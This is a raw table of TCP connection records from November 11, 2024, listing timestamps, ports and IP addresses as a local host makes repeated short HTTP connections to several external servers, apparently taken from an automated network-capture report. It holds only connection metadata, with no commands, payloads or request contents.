Nov 11, 2024 08:32:19.845133066 CET	49944	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:19.857229948 CET	49944	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:19.862147093 CET	80	49944	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:20.276957035 CET	80	49944	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:20.277000904 CET	49944	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:21.368753910 CET	49944	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:21.373574018 CET	80	49944	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.384054899 CET	49965	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:22.512372971 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.512449026 CET	49965	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:22.524729013 CET	49965	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:22.529759884 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.529772997 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.529901981 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.529903889 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.529946089 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.530024052 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.530241013 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.530289888 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.530375957 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.943877935 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:22.945171118 CET	49965	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:24.036967039 CET	49965	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:24.041887045 CET	80	49965	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:25.057149887 CET	49986	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:25.062211990 CET	80	49986	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:25.063920021 CET	49986	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:25.069839954 CET	49986	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:25.074748993 CET	80	49986	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:25.492129087 CET	80	49986	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:25.498924017 CET	80	49986	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:25.499026060 CET	49986	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:25.499752998 CET	49986	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:25.504904985 CET	80	49986	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:31.177706957 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:31.184150934 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:31.191153049 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:31.199103117 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:31.203947067 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.108701944 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.108719110 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.108767033 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:32.337985039 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.338001966 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.338052988 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:32.574610949 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.574625969 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.574630976 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.574696064 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:32.575779915 CET	80	50019	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:32.575829983 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:32.708961964 CET	50019	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:33.727206945 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:33.732090950 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:33.732314110 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:33.741302967 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:33.746157885 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:34.661957026 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:34.661974907 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:34.662020922 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:34.884119034 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:34.884130955 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:34.884195089 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:35.109405041 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:35.109412909 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:35.109419107 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:35.109556913 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:35.110724926 CET	80	50020	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:35.110851049 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:35.255827904 CET	50020	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:36.275439978 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:36.280421019 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.280488968 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:36.294193983 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:36.299177885 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299189091 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299231052 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299240112 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299320936 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299339056 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299418926 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299474001 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:36.299480915 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.275301933 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.275324106 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.275494099 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:37.508821011 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.508831024 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.511625051 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:37.744190931 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.744204044 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.744214058 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.744223118 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.744465113 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:37.745771885 CET	80	50021	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:37.745886087 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:37.803102016 CET	50021	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:38.822277069 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:38.827167988 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:38.827246904 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:38.834503889 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:38.839273930 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:39.842067957 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:39.842089891 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:39.842102051 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:39.842113972 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:39.842154980 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:39.842289925 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:39.899133921 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.108774900 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.108794928 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.108805895 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.108818054 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.108829975 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.108864069 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.109050989 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.109062910 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.109075069 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.109086990 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.109107018 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.109108925 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.161904097 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.376260996 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376281977 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376292944 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376303911 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376315117 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376355886 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.376471996 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376482964 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376497984 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.376507998 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.376537085 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.376557112 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.377113104 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.377147913 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.377206087 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.377307892 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.377341032 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.388376951 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:40.388452053 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.389425039 CET	50022	80	192.168.2.4	104.21.14.183
Nov 11, 2024 08:32:40.394226074 CET	80	50022	104.21.14.183	192.168.2.4
Nov 11, 2024 08:32:45.479253054 CET	50023	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:45.484138966 CET	80	50023	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:45.484257936 CET	50023	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:45.508449078 CET	50023	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:45.513544083 CET	80	50023	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:46.106987953 CET	80	50023	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:46.152935982 CET	50023	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:46.198263884 CET	80	50023	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:46.198307991 CET	50023	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:47.021358967 CET	50023	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:48.041496992 CET	50024	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:48.046421051 CET	80	50024	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:48.046483994 CET	50024	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:48.062088966 CET	50024	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:48.066907883 CET	80	50024	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:48.663258076 CET	80	50024	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:48.708858013 CET	50024	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:48.749514103 CET	80	50024	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:48.749562979 CET	50024	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:49.568247080 CET	50024	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:50.588202000 CET	50025	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:50.593135118 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.593202114 CET	50025	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:50.608810902 CET	50025	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:50.613697052 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613732100 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613801003 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613810062 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613816977 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613833904 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613843918 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613862038 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:50.613873959 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:51.164822102 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:51.225116968 CET	50025	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:51.233021975 CET	80	50025	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:51.233089924 CET	50025	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:52.115201950 CET	50025	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.137120008 CET	50026	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.142070055 CET	80	50026	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:53.146411896 CET	50026	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.153119087 CET	50026	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.157888889 CET	80	50026	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:53.708316088 CET	80	50026	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:53.757113934 CET	50026	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.776366949 CET	80	50026	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:53.778048992 CET	50026	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.778048992 CET	50026	80	192.168.2.4	67.223.117.142
Nov 11, 2024 08:32:53.782864094 CET	80	50026	67.223.117.142	192.168.2.4
Nov 11, 2024 08:32:58.805330038 CET	50027	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:58.810419083 CET	80	50027	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:58.810509920 CET	50027	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:58.819331884 CET	50027	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:58.824245930 CET	80	50027	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:59.243341923 CET	80	50027	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:59.243531942 CET	50027	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:00.333935022 CET	50027	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:00.347781897 CET	80	50027	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:01.361131907 CET	50028	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:01.366095066 CET	80	50028	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:01.366255045 CET	50028	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:01.377132893 CET	50028	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:01.381939888 CET	80	50028	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:01.802236080 CET	80	50028	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:01.805182934 CET	50028	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:02.882097006 CET	50028	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:02.930391073 CET	80	50028	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.899373055 CET	50029	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:03.904266119 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.904428959 CET	50029	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:03.915697098 CET	50029	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:03.920615911 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920625925 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920640945 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920650005 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920713902 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920722008 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920738935 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920747042 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:03.920753002 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:04.336551905 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:04.336605072 CET	50029	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:05.429127932 CET	50029	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:05.435384989 CET	80	50029	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:06.447447062 CET	50030	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:06.634551048 CET	80	50030	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:06.634752035 CET	50030	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:06.642258883 CET	50030	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:06.647038937 CET	80	50030	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:07.062824965 CET	80	50030	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:07.069180965 CET	80	50030	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:07.069674969 CET	50030	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:07.071366072 CET	50030	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:33:07.076128006 CET	80	50030	3.33.130.190	192.168.2.4
Nov 11, 2024 08:33:12.140427113 CET	50031	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:12.145349026 CET	80	50031	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:12.145409107 CET	50031	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:12.160445929 CET	50031	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:12.165354967 CET	80	50031	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:13.029171944 CET	80	50031	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:13.085136890 CET	50031	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:13.264803886 CET	80	50031	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:13.269138098 CET	50031	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:13.665138006 CET	50031	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:14.681937933 CET	50032	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:14.686827898 CET	80	50032	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:14.686902046 CET	50032	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:14.699512005 CET	50032	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:14.704467058 CET	80	50032	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:15.568097115 CET	80	50032	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:15.617146969 CET	50032	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:15.802602053 CET	80	50032	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:15.802706957 CET	50032	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:16.209012032 CET	50032	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:17.237148046 CET	50033	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:17.242095947 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.249147892 CET	50033	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:17.321186066 CET	50033	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:17.326179028 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326188087 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326191902 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326195955 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326199055 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326361895 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326364994 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326375008 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:17.326378107 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:18.127422094 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:18.177604914 CET	50033	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:18.365326881 CET	80	50033	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:18.365380049 CET	50033	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:18.833933115 CET	50033	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:19.855508089 CET	50034	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:19.861246109 CET	80	50034	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:19.865200043 CET	50034	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:19.934144974 CET	50034	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:19.939496994 CET	80	50034	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:20.751812935 CET	80	50034	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:20.802632093 CET	50034	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:20.984977007 CET	80	50034	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:20.985143900 CET	50034	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:20.985974073 CET	50034	80	192.168.2.4	113.20.119.31
Nov 11, 2024 08:33:20.990818024 CET	80	50034	113.20.119.31	192.168.2.4
Nov 11, 2024 08:33:26.419387102 CET	50035	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:26.424189091 CET	80	50035	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:26.424685001 CET	50035	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:26.437165022 CET	50035	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:26.442085981 CET	80	50035	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:27.281430960 CET	80	50035	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:27.396358013 CET	50035	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:27.503133059 CET	80	50035	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:27.503190041 CET	50035	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:27.943272114 CET	50035	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:28.965162039 CET	50036	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:28.970124006 CET	80	50036	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:28.977159023 CET	50036	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:28.985150099 CET	50036	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:28.990020037 CET	80	50036	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:29.837021112 CET	80	50036	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:29.880770922 CET	50036	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:30.230664015 CET	80	50036	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:30.233225107 CET	50036	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:30.490289927 CET	50036	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:31.510175943 CET	50037	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:31.515248060 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.515331984 CET	50037	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:31.528465033 CET	50037	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:31.533382893 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533394098 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533421040 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533430099 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533443928 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533521891 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533530951 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533552885 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:31.533565998 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:32.378504992 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:32.583879948 CET	50037	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:32.604202032 CET	80	50037	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:32.604830027 CET	50037	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:33.041162014 CET	50037	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:34.056565046 CET	50038	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:34.061435938 CET	80	50038	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:34.061517000 CET	50038	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:34.073201895 CET	50038	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:34.088176012 CET	80	50038	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:34.923799038 CET	80	50038	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:34.992839098 CET	50038	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:35.147682905 CET	80	50038	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:35.147757053 CET	50038	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:35.148781061 CET	50038	80	192.168.2.4	47.129.103.185
Nov 11, 2024 08:33:35.153522968 CET	80	50038	47.129.103.185	192.168.2.4
Nov 11, 2024 08:33:40.211287022 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.216136932 CET	80	50039	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:40.221246958 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.233179092 CET	50039	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:40.238281965 CET	80	50039	38.47.237.27	192.168.2.4
